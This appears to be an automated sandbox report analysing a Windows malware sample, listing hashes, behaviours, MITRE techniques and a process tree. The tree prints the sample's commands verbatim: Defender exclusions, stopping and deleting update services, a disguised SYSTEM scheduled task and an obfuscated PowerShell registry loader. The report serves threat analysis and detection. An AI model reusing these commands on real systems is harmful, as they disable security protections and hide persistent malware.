78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

Analysis

max time kernel
120s
max time network
38s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
16-11-2022 21:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dmi1dfg7n.exe
Size

2.8MB
MD5

9253ed091d81e076a3037e12af3dc871
SHA1

ec02829a25b3bf57ad061bbe54180d0c99c76981
SHA256

78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
SHA512

29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
SSDEEP

49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6

Score

10^/10

evasion

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 628 created 416 628 powershell.EXE winlogon.exe
PID 1944 created 416 1944 powershell.EXE winlogon.exe
Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

300 updater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

1976 taskeng.exe

description	pid	process	target process
PID 628 created 416	628	powershell.EXE	winlogon.exe
PID 1944 created 416	1944	powershell.EXE	winlogon.exe

pid	process
300	updater.exe

pid	process
1976	taskeng.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.EXEpowershell.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 3 IoCs

Processes:

dmi1dfg7n.exepowershell.EXEpowershell.EXE

description	pid	process	target process
PID 1700 set thread context of 596	1700	dmi1dfg7n.exe	dialer.exe
PID 628 set thread context of 1372	628	powershell.EXE	dllhost.exe
PID 1944 set thread context of 432	1944	powershell.EXE	dllhost.exe

Drops file in Program Files directory 1 IoCs

Processes:

dmi1dfg7n.exe

description ioc process

File created C:\Program Files\Google\Chrome\updater.exe dmi1dfg7n.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	dmi1dfg7n.exe

Drops file in Windows directory 4 IoCs

Processes:

dialer.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe

Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1296 sc.exe
1108 sc.exe
1924 sc.exe
1356 sc.exe
1804 sc.exe
1256 sc.exe
920 sc.exe
1828 sc.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

868 schtasks.exe

pid	process
1296	sc.exe
1108	sc.exe
1924	sc.exe
1356	sc.exe
1804	sc.exe
1256	sc.exe
920	sc.exe
1828	sc.exe

pid	process
868	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10cc66da08fad801	powershell.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exepowershell.exe

pid	process
1704	powershell.exe
340	powershell.exe
1280	powershell.exe
628	powershell.EXE
628	powershell.EXE
1944	powershell.EXE
1372	dllhost.exe
1372	dllhost.exe
1372	dllhost.exe
1372	dllhost.exe
1944	powershell.EXE
616	powershell.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowershell.exepowershell.EXEdllhost.exepowershell.EXEpowershell.exe

description	pid	process
Token: SeDebugPrivilege	1704	powershell.exe
Token: SeShutdownPrivilege	1000	powercfg.exe
Token: SeShutdownPrivilege	1492	powercfg.exe
Token: SeShutdownPrivilege	1372	powercfg.exe
Token: SeDebugPrivilege	340	powershell.exe
Token: SeShutdownPrivilege	1432	powercfg.exe
Token: SeDebugPrivilege	1280	powershell.exe
Token: SeDebugPrivilege	628	powershell.EXE
Token: SeDebugPrivilege	628	powershell.EXE
Token: SeDebugPrivilege	1372	dllhost.exe
Token: SeDebugPrivilege	1944	powershell.EXE
Token: SeDebugPrivilege	1944	powershell.EXE
Token: SeDebugPrivilege	616	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dmi1dfg7n.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 1700 wrote to memory of 1704	1700	dmi1dfg7n.exe	powershell.exe
PID 1700 wrote to memory of 1704	1700	dmi1dfg7n.exe	powershell.exe
PID 1700 wrote to memory of 1704	1700	dmi1dfg7n.exe	powershell.exe
PID 1700 wrote to memory of 520	1700	dmi1dfg7n.exe	cmd.exe
PID 1700 wrote to memory of 520	1700	dmi1dfg7n.exe	cmd.exe
PID 1700 wrote to memory of 520	1700	dmi1dfg7n.exe	cmd.exe
PID 1700 wrote to memory of 1292	1700	dmi1dfg7n.exe	cmd.exe
PID 1700 wrote to memory of 1292	1700	dmi1dfg7n.exe	cmd.exe
PID 1700 wrote to memory of 1292	1700	dmi1dfg7n.exe	cmd.exe
PID 1700 wrote to memory of 340	1700	dmi1dfg7n.exe	powershell.exe
PID 1700 wrote to memory of 340	1700	dmi1dfg7n.exe	powershell.exe
PID 1700 wrote to memory of 340	1700	dmi1dfg7n.exe	powershell.exe
PID 1292 wrote to memory of 1000	1292	cmd.exe	powercfg.exe
PID 1292 wrote to memory of 1000	1292	cmd.exe	powercfg.exe
PID 1292 wrote to memory of 1000	1292	cmd.exe	powercfg.exe
PID 520 wrote to memory of 1356	520	cmd.exe	sc.exe
PID 520 wrote to memory of 1356	520	cmd.exe	sc.exe
PID 520 wrote to memory of 1356	520	cmd.exe	sc.exe
PID 520 wrote to memory of 1804	520	cmd.exe	sc.exe
PID 520 wrote to memory of 1804	520	cmd.exe	sc.exe
PID 520 wrote to memory of 1804	520	cmd.exe	sc.exe
PID 520 wrote to memory of 1256	520	cmd.exe	sc.exe
PID 520 wrote to memory of 1256	520	cmd.exe	sc.exe
PID 520 wrote to memory of 1256	520	cmd.exe	sc.exe
PID 1292 wrote to memory of 1492	1292	cmd.exe	powercfg.exe
PID 1292 wrote to memory of 1492	1292	cmd.exe	powercfg.exe
PID 1292 wrote to memory of 1492	1292	cmd.exe	powercfg.exe
PID 1292 wrote to memory of 1372	1292	cmd.exe	powercfg.exe
PID 1292 wrote to memory of 1372	1292	cmd.exe	powercfg.exe
PID 1292 wrote to memory of 1372	1292	cmd.exe	powercfg.exe
PID 520 wrote to memory of 920	520	cmd.exe	sc.exe
PID 520 wrote to memory of 920	520	cmd.exe	sc.exe
PID 520 wrote to memory of 920	520	cmd.exe	sc.exe
PID 1292 wrote to memory of 1432	1292	cmd.exe	powercfg.exe
PID 1292 wrote to memory of 1432	1292	cmd.exe	powercfg.exe
PID 1292 wrote to memory of 1432	1292	cmd.exe	powercfg.exe
PID 520 wrote to memory of 1828	520	cmd.exe	sc.exe
PID 520 wrote to memory of 1828	520	cmd.exe	sc.exe
PID 520 wrote to memory of 1828	520	cmd.exe	sc.exe
PID 520 wrote to memory of 780	520	cmd.exe	reg.exe
PID 520 wrote to memory of 780	520	cmd.exe	reg.exe
PID 520 wrote to memory of 780	520	cmd.exe	reg.exe
PID 520 wrote to memory of 1532	520	cmd.exe	reg.exe
PID 520 wrote to memory of 1532	520	cmd.exe	reg.exe
PID 520 wrote to memory of 1532	520	cmd.exe	reg.exe
PID 520 wrote to memory of 812	520	cmd.exe	reg.exe
PID 520 wrote to memory of 812	520	cmd.exe	reg.exe
PID 520 wrote to memory of 812	520	cmd.exe	reg.exe
PID 520 wrote to memory of 948	520	cmd.exe	reg.exe
PID 520 wrote to memory of 948	520	cmd.exe	reg.exe
PID 520 wrote to memory of 948	520	cmd.exe	reg.exe
PID 520 wrote to memory of 968	520	cmd.exe	reg.exe
PID 520 wrote to memory of 968	520	cmd.exe	reg.exe
PID 520 wrote to memory of 968	520	cmd.exe	reg.exe
PID 340 wrote to memory of 868	340	powershell.exe	schtasks.exe
PID 340 wrote to memory of 868	340	powershell.exe	schtasks.exe
PID 340 wrote to memory of 868	340	powershell.exe	schtasks.exe
PID 1700 wrote to memory of 596	1700	dmi1dfg7n.exe	dialer.exe
PID 1700 wrote to memory of 596	1700	dmi1dfg7n.exe	dialer.exe
PID 1700 wrote to memory of 596	1700	dmi1dfg7n.exe	dialer.exe
PID 1700 wrote to memory of 596	1700	dmi1dfg7n.exe	dialer.exe
PID 1700 wrote to memory of 1280	1700	dmi1dfg7n.exe	powershell.exe
PID 1700 wrote to memory of 1280	1700	dmi1dfg7n.exe	powershell.exe
PID 1700 wrote to memory of 1280	1700	dmi1dfg7n.exe	powershell.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:460

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{886e60f2-ef5e-442c-80fb-55cca28a0843}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{e51c047c-d782-49e0-98b0-5f9f18c9b57e}
2⤵
PID:432

C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe
"C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
1⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1356

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1804

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1256

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:920

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1828

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:780

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1532

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:948

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:968

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:812

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1000

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1492

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:340

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
3⤵
- Creates scheduled task(s)
PID:868

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
2⤵
- Drops file in Windows directory
PID:596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1280

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:1604

C:\Windows\system32\taskeng.exe
taskeng.exe {7B6D8B31-FAB0-463F-953F-2A0F634E7918} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:1976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Executes dropped EXE
PID:300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:616

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1292

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1296

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1108

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1924

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:1600

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
PID:1280

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
PID:560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
3⤵
PID:2036

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe xtrjicqmdliu
3⤵
PID:1492

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
2.8MB

MD5
eb27bb8cfa99d659e4fe023e9002ecd1

SHA1
c783400302fdfae0518269c5a5a8d4bad29f42a3

SHA256
9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

SHA512
ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
bc47eb28a9aa788a6222a80686d77b55

SHA1
666f3ed7597fbe39b19e4dc176b504c1fbfa0975

SHA256
400c34586ab33f7b1ad2a02ba82525d4579c7c2d18949fc8c7df28089c8e4527

SHA512
5697b16d001432643476b4128441be23facd250915dea6bcb7eeb1a8487e7e9d52748eaf18f582bfd73a70a0f9faf34538e875b32155aecb9b9dcf9e00d26025

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
bc47eb28a9aa788a6222a80686d77b55

SHA1
666f3ed7597fbe39b19e4dc176b504c1fbfa0975

SHA256
400c34586ab33f7b1ad2a02ba82525d4579c7c2d18949fc8c7df28089c8e4527

SHA512
5697b16d001432643476b4128441be23facd250915dea6bcb7eeb1a8487e7e9d52748eaf18f582bfd73a70a0f9faf34538e875b32155aecb9b9dcf9e00d26025

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Program Files\Google\Chrome\updater.exe
Filesize
2.8MB

MD5
eb27bb8cfa99d659e4fe023e9002ecd1

SHA1
c783400302fdfae0518269c5a5a8d4bad29f42a3

SHA256
9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

SHA512
ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

Download Submit
memory/300-103-0x0000000000000000-mapping.dmp

Download
memory/340-64-0x0000000000000000-mapping.dmp

Download
memory/340-87-0x000000000263B000-0x000000000265A000-memory.dmp

Filesize
124KB

Download
memory/340-74-0x000007FEF2830000-0x000007FEF338D000-memory.dmp

Filesize
11.4MB

Download
memory/340-77-0x000000001B770000-0x000000001BA6F000-memory.dmp

Filesize
3.0MB

Download
memory/340-71-0x000007FEF3390000-0x000007FEF3DB3000-memory.dmp

Filesize
10.1MB

Download
memory/340-86-0x0000000002634000-0x0000000002637000-memory.dmp

Filesize
12KB

Download
memory/340-83-0x0000000002634000-0x0000000002637000-memory.dmp

Filesize
12KB

Download
memory/416-128-0x0000000036EB0000-0x0000000036EC0000-memory.dmp

Filesize
64KB

Download
memory/416-127-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmp

Filesize
64KB

Download
memory/416-141-0x0000000000880000-0x00000000008AA000-memory.dmp

Filesize
168KB

Download
memory/416-124-0x00000000007B0000-0x00000000007D3000-memory.dmp

Filesize
140KB

Download
memory/416-140-0x00000000007B0000-0x00000000007D3000-memory.dmp

Filesize
140KB

Download
memory/432-153-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/432-156-0x00000000004039E0-mapping.dmp

Download
memory/460-134-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmp

Filesize
64KB

Download
memory/460-135-0x0000000036EB0000-0x0000000036EC0000-memory.dmp

Filesize
64KB

Download
memory/460-143-0x00000000001E0000-0x000000000020A000-memory.dmp

Filesize
168KB

Download
memory/476-136-0x0000000036EB0000-0x0000000036EC0000-memory.dmp

Filesize
64KB

Download
memory/476-142-0x00000000001F0000-0x000000000021A000-memory.dmp

Filesize
168KB

Download
memory/476-133-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmp

Filesize
64KB

Download
memory/520-62-0x0000000000000000-mapping.dmp

Download
memory/560-165-0x0000000000000000-mapping.dmp

Download
memory/588-172-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmp

Filesize
64KB

Download
memory/588-174-0x0000000036EB0000-0x0000000036EC0000-memory.dmp

Filesize
64KB

Download
memory/596-88-0x0000000140001844-mapping.dmp

Download
memory/616-163-0x0000000000E3B000-0x0000000000E5A000-memory.dmp

Filesize
124KB

Download
memory/616-149-0x000007FEF31D0000-0x000007FEF3D2D000-memory.dmp

Filesize
11.4MB

Download
memory/616-138-0x0000000000000000-mapping.dmp

Download
memory/616-151-0x0000000000E34000-0x0000000000E37000-memory.dmp

Filesize
12KB

Download
memory/616-147-0x000007FEF3D30000-0x000007FEF4753000-memory.dmp

Filesize
10.1MB

Download
memory/616-167-0x0000000000E34000-0x0000000000E37000-memory.dmp

Filesize
12KB

Download
memory/628-110-0x000007FEF2830000-0x000007FEF338D000-memory.dmp

Filesize
11.4MB

Download
memory/628-109-0x000007FEF3390000-0x000007FEF3DB3000-memory.dmp

Filesize
10.1MB

Download
memory/628-121-0x0000000076D50000-0x0000000076E6F000-memory.dmp

Filesize
1.1MB

Download
memory/628-113-0x0000000076D50000-0x0000000076E6F000-memory.dmp

Filesize
1.1MB

Download
memory/628-115-0x0000000000C40000-0x0000000000CC0000-memory.dmp

Filesize
512KB

Download
memory/628-120-0x0000000076E70000-0x0000000077019000-memory.dmp

Filesize
1.7MB

Download
memory/628-101-0x0000000000000000-mapping.dmp

Download
memory/628-112-0x0000000076E70000-0x0000000077019000-memory.dmp

Filesize
1.7MB

Download
memory/628-111-0x0000000000C40000-0x0000000000CC0000-memory.dmp

Filesize
512KB

Download
memory/668-176-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmp

Filesize
64KB

Download
memory/668-178-0x0000000036EB0000-0x0000000036EC0000-memory.dmp

Filesize
64KB

Download
memory/756-182-0x0000000036EB0000-0x0000000036EC0000-memory.dmp

Filesize
64KB

Download
memory/756-180-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmp

Filesize
64KB

Download
memory/780-79-0x0000000000000000-mapping.dmp

Download
memory/812-81-0x0000000000000000-mapping.dmp

Download
memory/868-85-0x0000000000000000-mapping.dmp

Download
memory/920-75-0x0000000000000000-mapping.dmp

Download
memory/948-82-0x0000000000000000-mapping.dmp

Download
memory/968-84-0x0000000000000000-mapping.dmp

Download
memory/1000-65-0x0000000000000000-mapping.dmp

Download
memory/1108-161-0x0000000000000000-mapping.dmp

Download
memory/1256-70-0x0000000000000000-mapping.dmp

Download
memory/1280-159-0x0000000000000000-mapping.dmp

Download
memory/1280-95-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

Filesize
3.0MB

Download
memory/1280-97-0x000000000235B000-0x000000000237A000-memory.dmp

Filesize
124KB

Download
memory/1280-96-0x0000000002354000-0x0000000002357000-memory.dmp

Filesize
12KB

Download
memory/1280-89-0x0000000000000000-mapping.dmp

Download
memory/1280-93-0x000007FEF3D30000-0x000007FEF4753000-memory.dmp

